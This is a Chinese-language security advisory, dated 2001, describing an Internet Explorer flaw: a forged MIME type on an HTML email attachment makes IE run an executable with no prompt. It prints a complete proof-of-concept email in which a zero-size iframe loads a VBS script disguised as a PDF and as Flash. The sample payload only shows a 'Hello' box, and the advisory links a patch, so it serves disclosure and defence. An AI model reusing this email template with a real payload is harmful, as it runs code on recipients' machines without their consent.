不正确的MIME头会导致IE执行EMAIL附件发布时间:2001-04-04 更新时间:2001-04-04 严重程度:高 威胁程度:普通用户访问权限 错误类型:设计错误 利用方式:服务器模式 受影响系统 影响系统:详细描述 HTML EMAIL是一个简单的WEB页类型,IE可以读和打开MIME中响应类型 的文件,但是在处理不正常的MIME类型中存在问题,攻击者可以建立一个 包含可执行文件的附件的HTML EMAIL并修改MIME头,使IE不正确处理这个 MIME所指定的执行文件附件。其主要原因是如果附件是文本文件,IE会读 它,如果是VIDEO CLIP,IE会查看,如果是图形文件,IE就会显示它,但 如果是一个EXE文件,IE就会提示用户是否执行,但当攻击者更改MIME类型 后,IE就会不经过提示用户是否执行而直接运行,造成一定程序的破坏。 测试代码 --------8<----cut here-------8< From: "Ripped from Juan Carlos Garcia Cuartango" Subject: mail Date: Thu, 2 Nov 2000 13:27:33 +0100 MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="1" X-Priority: 3 X-MSMail-Priority: Normal --1 Content-Type: multipart/alternative; boundary="2" --2 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <HTML> <HEAD> </HEAD> <BODY bgColor=3D#ffffff > <iframe src=3Dcid:donthurtme.pdf height=3D0 width=3D0></iframe> Done<br> </BODY> </HTML> --2-- --1 Content-Type: application/x-shockwave-flash; name="hola.vbs" Content-Transfer-Encoding: quoted-printable Content-ID: <donthurtme.pdf> msgbox("Hello") --1 --------8<--cut here---------8< 上面的保存为一个EML文件,将会执行HELLO的对话。 解决方案 补丁下载: http://www.microsoft.com/windows/ie/download/critical/Q290108/default.asp 相关信息 此信息有Juan Carlos Cuartango(http://www.kriptopolis.com/)提供。 |
